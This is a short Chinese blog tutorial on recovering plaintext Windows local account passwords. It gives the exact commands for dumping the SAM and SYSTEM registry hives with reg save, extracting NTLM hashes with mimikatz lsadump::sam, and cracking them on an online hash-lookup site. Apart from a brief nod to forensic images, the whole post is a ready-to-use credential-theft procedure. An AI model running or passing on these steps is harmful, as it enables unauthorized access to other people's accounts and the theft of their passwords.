当前位置:   article > 正文

破解Windows本地账户密码(拿到明文密码)_sam破译成明文的密码文件

sam破译成明文的密码文件

破解Windows本地账户密码(拿到明文密码)

1.导出sam和system文件

以管理员身份运行CMD命令行工具
在这里插入图片描述
输入:
reg save hklm\sam sam.hive (本机密码)
reg save hklm\system system.hive (本机密码)
在这里插入图片描述
导出路径为当前目录
在这里插入图片描述

PE模式下(win预安装模式)或直接连接硬盘找 C:\windows\system32\config\sam和system文件
在这里插入图片描述
取证镜像模式下 找镜像文件下 C:\windows\system32\config\sam和system文件
在这里插入图片描述

2.读取sam和system文件获取Hash NTLM加密后的密码

mimikatz(实战工具有被杀的风险)(完整用法自行百度,我也不知道)
把sam.hive system.hive 或 sam system文件放在mimikatz.exe 同一目录下
在这里插入图片描述
以管理员身份运行mimikatz.exe
在这里插入图片描述
输入:
lsadump::sam /sam:sam.hive /system:system.hive

lsadump::sam /sam:sam /system:system
(主要看导出的sam和system文件是那种方法)
在这里插入图片描述
得到Hash NTLM加密后的密码

3.在线网站在线破解密码例如:www.cmd5.com 拿到明文密码

在这里插入图片描述

结束

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/知新_RL/article/detail/727133
推荐阅读
相关标签
  

闽ICP备14008679号